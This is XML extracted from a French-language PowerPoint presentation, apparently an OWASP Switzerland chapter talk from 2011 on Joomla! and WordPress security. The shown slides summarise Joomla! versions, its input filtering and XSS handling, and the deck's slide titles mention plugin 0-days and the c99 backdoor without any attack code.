            <a:fld id="{69C5922D-9CE9-4DAF-BDE8-72278C1EA405}" type="slidenum">
              <a:rPr lang="fr-CH" smtClean="0"/>
              <a:pPr/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-CH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16645"/>
            <a:ext cx="1676400" cy="64032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644919"/>
            <a:ext cx="104775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44919"/>
            <a:ext cx="104775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Joomla!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CMS libre et open source (GNU GPL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>PHP + MySQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Fork (évolution) du projet Mambo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Très modulaire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>2005: Version 1.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>2008: Version 1.5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>2011 (10 janvier): version 1.6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smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>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907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Sécurité de Joomla!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Version 1.0: Quasiment rien</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Version 1.5: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Filtrage des données</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Audit des requêtes SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Plus de chemin variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Meilleure gestion des sessions (session ID)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Pas de gestion fine des accès à la base de données</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Version 1.6: Trop récente, pas évaluée</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Il existe un «Secure Coding Guideline»</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="fr-CH" dirty="0" smtClean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8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402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Joomla!: Cross-Site Scripting (XSS)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JRequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Filtrage des entrées</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Gestion des guillemets (magic quotes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>En lieu et place de $_GET, $_POST, $_REQUEST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Mais ne “comprend” pas le SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Rien pour la partie sortie (output)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>C’est au développeur de penser à utiliser les bonnes méthodes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69C5922D-9CE9-4DAF-BDE8-72278C1EA405}" type="slidenum">
              <a:rPr lang="fr-CH" noProof="0" smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="fr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898989"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP Switzerland – Geneva Chapter Meeting @ HEIG-VD (Yverdon-Les-Bains) – Feb.2011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92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2870</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>488</Paragraphs>
  <Slides>65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Chapter meeting 17 février 2011 @ HEIG-VD Yverdon-Les-Bains </vt:lpstr>
      <vt:lpstr>Qui sommes-nous?</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>WordPress, Joomla!</vt:lpstr>
      <vt:lpstr>Plug-ins</vt:lpstr>
      <vt:lpstr>Sécurité</vt:lpstr>
      <vt:lpstr>Joomla!</vt:lpstr>
      <vt:lpstr>Sécurité de Joomla!</vt:lpstr>
      <vt:lpstr>Joomla!: Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Joomla!: Téléchargement (upload)</vt:lpstr>
      <vt:lpstr>Joomla!: Injections SQL</vt:lpstr>
      <vt:lpstr>Joomla!: Cross-Site Request Forgery</vt:lpstr>
      <vt:lpstr>Joomla! - En résumé</vt:lpstr>
      <vt:lpstr>WordPress</vt:lpstr>
      <vt:lpstr>Historique de WordPress (simplifiée)</vt:lpstr>
      <vt:lpstr>Sécurité de WordPress</vt:lpstr>
      <vt:lpstr>WordPress: Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>XSS: Erreur commune</vt:lpstr>
      <vt:lpstr>WordPress: Téléchargement (upload)</vt:lpstr>
      <vt:lpstr>WordPress: Injections SQL</vt:lpstr>
      <vt:lpstr>WordPress: Cross-Site Request Forgery</vt:lpstr>
      <vt:lpstr>WordPress - En résumé</vt:lpstr>
      <vt:lpstr>En pratique: 0-days</vt:lpstr>
      <vt:lpstr>0-day: Joomla! | CBProfileGallery</vt:lpstr>
      <vt:lpstr>CBProfileGallery - XSS</vt:lpstr>
      <vt:lpstr>Pourquoi ?</vt:lpstr>
      <vt:lpstr>OWASP Application Security Verification Standard 2009 </vt:lpstr>
      <vt:lpstr>OWASP Application Security Verification Standard 2009</vt:lpstr>
      <vt:lpstr>OWASP Code Review Guide 2008 (1.1)</vt:lpstr>
      <vt:lpstr>OWASP Testing Guide 2008 (3.0)</vt:lpstr>
      <vt:lpstr>0-day: Joomla! | ProjectFork</vt:lpstr>
      <vt:lpstr>JoomGallery - CSRF</vt:lpstr>
      <vt:lpstr>0-day: Joomla! | JoomGallery</vt:lpstr>
      <vt:lpstr>Attaque</vt:lpstr>
      <vt:lpstr>Après l’attaque</vt:lpstr>
      <vt:lpstr>Pourquoi ?</vt:lpstr>
      <vt:lpstr>OWASP Application Security Verification Standard 2009</vt:lpstr>
      <vt:lpstr>OWASP Code Review Guide 2008 (1.1)</vt:lpstr>
      <vt:lpstr>0-day: WordPress | User Photo</vt:lpstr>
      <vt:lpstr>Profil</vt:lpstr>
      <vt:lpstr>Interception de la requête HTTP</vt:lpstr>
      <vt:lpstr>Backdoor téléchargée</vt:lpstr>
      <vt:lpstr>Backdoor (c99 par exemple)</vt:lpstr>
      <vt:lpstr>User Photo: Bonus</vt:lpstr>
      <vt:lpstr>Est-ce que User Photo est utilisé ?</vt:lpstr>
      <vt:lpstr>OWASP</vt:lpstr>
      <vt:lpstr>Publication</vt:lpstr>
      <vt:lpstr>c99: un cheval de Troie dans la backdoor ? </vt:lpstr>
      <vt:lpstr>c99 - images</vt:lpstr>
      <vt:lpstr>Mais…</vt:lpstr>
      <vt:lpstr>Cryptool 2</vt:lpstr>
      <vt:lpstr>Exemple simple de Cryptool</vt:lpstr>
      <vt:lpstr>URL Encode pour Cryptool 2</vt:lpstr>
      <vt:lpstr>c99</vt:lpstr>
      <vt:lpstr>3 lignes de code</vt:lpstr>
      <vt:lpstr>Etape #1</vt:lpstr>
      <vt:lpstr>Etape #2</vt:lpstr>
      <vt:lpstr>Etape #3</vt:lpstr>
      <vt:lpstr>Etape #4</vt:lpstr>
      <vt:lpstr>Résultat</vt:lpstr>
      <vt:lpstr>Conclusion</vt:lpstr>
      <vt:lpstr>Références</vt:lpstr>
      <vt:lpstr>Références</vt:lpstr>
      <vt:lpstr>Questions?</vt:lpstr>
      <vt:lpstr>Merci!</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>OWASP Switzerland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meeting 17 février 2011 @ HEIG-VD Yverdon-Les-Bains</dc:title>
  <dc:creator>Sebastien Andrivet</dc:creator>
  <cp:keywords>security, appsec, webappsec, owasp, geneva, switzerland</cp:keywords>
  <cp:lastModifiedBy>ADVtools</cp:lastModifiedBy>
  <cp:revision>30</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-12-20T17:04:32Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-02-11T10:35:17Z</dcterms:modified>
</cp:coreProperties>
</file>